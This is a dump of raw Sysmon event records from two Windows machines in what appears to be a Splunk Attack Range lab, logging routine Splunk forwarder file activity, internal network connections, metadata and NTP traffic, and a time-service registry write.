10:47:22.241{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AA4F33B43DDE7F19E8A87B1E8CB8869,SHA256=E5AC6FA51F3238EF313871070B05DBA2FB4EBEFC8F2AACB1BC025D4895F73560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:23.844{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F284A7914C22DFC00ECD28F4DD0DA3F,SHA256=8868DBB8CF0EB8A3522A33F1EAF1AFB734341C4779DFB470C212571380596E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:23.460{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C55E12F90E8B165879D4B816E6B86105,SHA256=C743DEE9180A757E0921CF5B1236E7E75761EB11B006F4833EAD64B4638DEB93,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53386-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:24.860{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=198CFF74D3DC4800EF45D0410D3FEB9F,SHA256=C2909ECABD2C73BCA2E25C634BF7B758D5EAF9B3A540625B0402BA251E7C0E3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:24.476{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06B22B241F699E78ABFF1ADDF6E377B4,SHA256=C9008C0060FF0375094F043330DA82BABFAE0F416DB73C25EB77FF67F28951C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:25.891{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A980009E236A4D5806ADDCF0098B5F21,SHA256=346ED7CFF67187929554C7D78CD74A4459672B11CEBC47DEDDF87298BE000937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:25.585{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C6317B8EF9D2FCE3671B370561920EE,SHA256=DFECFCFC0AA69D8AD132A34FC6043E2CBE8DFB6D99AE032B764589FBCF5EEB09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:26.953{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5183115D568E59DCDE1C310877AD174A,SHA256=8DC6DE341BFB7917BCA19256D61AD375ED23353F17D1EE0F909AA82BE1C3A7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:26.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAFA0E5754871361912FB6BBABEDC0C3,SHA256=756A4130298483DA09DC0E51060507D407216084B89FEC11B8D626F63C7DC444,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:27.969{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7AB8C5E651F59D3E517D6B3C9C2D73D,SHA256=39A015561336E0381CF97C162507925A4413F9242DCCD774CC8E32CB3D5A0196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:27.851{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0595E34586E461D544B9C829941C2AC2,SHA256=00480B98918AC82C88FE52F1E3FEFCA5E430DEA4F9669D01CC6C958CD575ED9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:24.635{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51299-false10.0.1.12-8000- 23542300x8000000000000000216049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:28.867{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0394D66AD17DCDE71DDC6BB80CB9FEF6,SHA256=3B8DC98BEC066B9CC0B4D49D5FA3AD3737E0934494A1CB3EAA7594EFD9EB88C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:26.599{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53387-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:29.016{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B880ECBF798D70EA05D7FB1C36491F29,SHA256=3DED44FC17384205ACF2A99C60377F3547243A4F1F9B830B3B63177ECEC6A509,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:30.273{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7CAFF3610FA029D0C3310742B1588EBD,SHA256=7A441A1831065A9C549EED1D133231B889EE752ABC4F34F53CD99F753FD50D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:30.101{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662C1F031BF42B36992527D69185C662,SHA256=2F255967B959318A8D67527050A148FA32F33D9130E62B2505F42BF040B4C64E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:30.031{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA43DC2F2A141EFD4FCDF4326485A72,SHA256=AD7349CEA89E24FE1D1F99BAD6D942B4F4C8571150DFB9D33DD3AA93E26945DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:29.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51300-false10.0.1.12-8000- 13241300x8000000000000000216053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 10:47:31.335{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a2-0xc2145f50) 23542300x8000000000000000216052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:31.116{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F40B94C1A89CF9A348429EA5306DAD3E,SHA256=63B92AA51E5F4470756360F8A2388A4EC1C33DE6CB848145E1398FAFDC4797CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:31.063{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=692941921AD075BA56C55CEE75709D9B,SHA256=ED19C7F4CE54856E1C570B2FC4E8507815F3E3AA30AFB9F6263D22F2EE58E95F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:30.758{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal123ntpfalse169.254.169.123-123ntp 23542300x8000000000000000216055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:32.351{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52DFE312145856909158863D043197C9,SHA256=4385D9DFE9869FA70A6886CF9000DB9C2F856F0121E132BDE1AE0B12FD81B4CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:32.094{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E49623DEDF80E03E70348237D9F9687A,SHA256=D671FFE0CFDDC8B0DE68AFC7ECD151A5D1ABC36EE44CA2AE4F6C88676393254F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:33.585{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021439C205E713916CB2F750C38BE4B8,SHA256=4D6E428D369B94FBD84C216D32217E75ABEA1A120AAF01715E69828F43146873,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:33.328{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E85F8826AFC0969C5710B02CEDBFB240,SHA256=163AED3837F9EC2D0CB54E98EA94A297575C5DA14ACAD4C51242151C99E828A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:33.110{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9534A789A6D4C79632515643A6F2E6A7,SHA256=F2B809092DBAA9ECB8D8A3C25C8A1B19A57254A8B9ACF916C7B7C7396A5B6437,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:34.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75B49FAF0E4CEF7DC028A93122636492,SHA256=3B48893CF24F19EA779899E3655BDF43575FF6F72053E5B344C8091B43631A2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:34.125{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2105DD549CE81D5F0EC1F14537A27A7B,SHA256=18857EC6E1BD2160766BEBE1DAC50AA8F3F668A9A7E60F24972AD9EA43B8851F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:31.692{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53388-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:35.686{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20295D5A8F26FD6C7A19F2BC7BFF5EF5,SHA256=66348C094D7FE5B9685523874720125CD557D34EA72892F74B9DEAA5F1C0218E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:35.141{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B50CA60DF87BC4297379BD3E61AB3331,SHA256=1F7A63C43A9CF58487E8ADF33431F8420552D9B82F8A3508D73D09582EF62797,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:33.139{4F8D34B0-F120-6215-3B00-000000003902}2612C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51302-false169.254.169.254-80http 354300x8000000000000000216059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:33.138{4F8D34B0-F120-6215-3B00-000000003902}2612C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51301-false169.254.169.254-80http 354300x8000000000000000216063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:34.689{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51303-false10.0.1.12-8000- 23542300x8000000000000000216062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:36.686{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4BBEFAA199CAB26209B46BA91B8229C,SHA256=14B8CA6AD562000F80857882FD2F40B65687E751DF3406E8509643ACE1A2E62B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:36.219{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C77753205D98B0D284E0E377B38F70,SHA256=FD9E1E906BD41C492275607CEC9DE6AC3796BDC28FBBBF448E1DCE2F06188EC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:37.686{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A18E3A62563C77E4801E1C5650DCADAB,SHA256=27F9C2B6828150C1F8AACD24652E29002386A25A38D9EE8CBD7885352186F65F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:37.250{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36C00D67B39A1422F80BC967F49E155C,SHA256=E8510528206D0E2C263A75E86C42C01CD8B86D1DA95412C2A94F583AE3BEEC2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:38.701{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B696F5E7BABF1FDBC45C4E757F319C36,SHA256=F8F2AB82705FD67357D9F48F87944BD661648AC982A19E1B218063B5B945F432,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:36.708{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53389-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:38.266{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2EAC0548822F54A42FC73F387ED350A,SHA256=66B75AFC2EE025F22E850B4BDD7CD48D53E7A39728816A2A3E4882EE3EBD1251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:39.717{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E9C2A9CED13C018E3D584C9D9ED07A5,SHA256=1345D62425F82CE5F9A88AB0031B183F48BC1E23A8FBFC390A83C1121BFA7B2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:39.719{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:39.281{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79FE06C733B592627D6447F630C4AF6A,SHA256=8077159DB6532503C7B4978348403CE749908DEBF58906784A2804D7A96DD8AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:40.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=698C387A6418CB826B8656DF33F2C539,SHA256=01C78C9F57E6940968637DD57DD9FE7B1C51E161505925DE41D2BFC6FA9B5647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:40.313{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75172DE2586CDED224088B1DCB418F8,SHA256=84279C5822A725869020C2B07083C6B8C035838004CEC25F0B5372CFB565F257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:41.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FD2D94690E935F27542262C612004C7,SHA256=64457144EB07DB710BD45612D0AFABF9E427FA948924B4C44EAC2E341A547AF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:39.177{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53390-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000287169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:42.469{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A22464986644A9018C03264C455D90E,SHA256=7CE72FAA5186EF49C2B4A1A060A31C4DDF344F745F2B084C73490FAF0B0CAB70,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:40.516{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51304-false10.0.1.12-8000- 